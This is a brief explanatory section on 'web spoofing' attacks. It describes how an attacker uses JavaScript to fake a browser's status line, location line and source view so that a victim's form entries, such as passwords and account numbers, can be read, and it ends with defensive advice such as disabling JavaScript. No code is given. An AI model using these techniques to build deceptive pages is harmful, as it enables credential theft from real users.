Perfecting the False Web

Perfecting the False Web

The illusion is completed as follows:
• Browser status line - The status line at the bottom of the browser
window could give the game away by showing the rewritten URL's.
This is prevented by camouflaging the rewritten URL with a
JavaScript program that 'overwrites' this line.
• Browser location line - The same trick is applied to the location line
which displays the URL currently shown.
• HTML source code - Viewing the document HTML source code
could give rewritten URL's away, if it were not for a JavaScript
program that hides the browser's bar with an exact replica, and
shows the original HTML code when the 'View Document Source'
button is hit.
• Viewing document information - Again, the same trick using a
JavaScript program is applied when 'Viewing Document
Information':
The attacker can now observe and alter any data going from the victim
to the Web servers and control all return traffic from the Web servers to
the victim. Since most on-line commerce is done via forms, this means
the attacker can observe any account numbers or passwords the victim
enters.


Conclusion
No foolproof remedies for this type of attack exist. One could:
• Disable JavaScript.
• Make sure the location line is always visible.
• Pay attention to location line and make sure it always points to the
expected server.
At present, JavaScript, ActiveX, and Java all tend to facilitate spoofing
and other security attacks, so it is recommended to disable them. Doing
so will cause the loss of some useful functionality, but much of this loss
can be recouped by selectively turning on these features when visiting a
trusted site that requires them.
No long-term solution is in sight.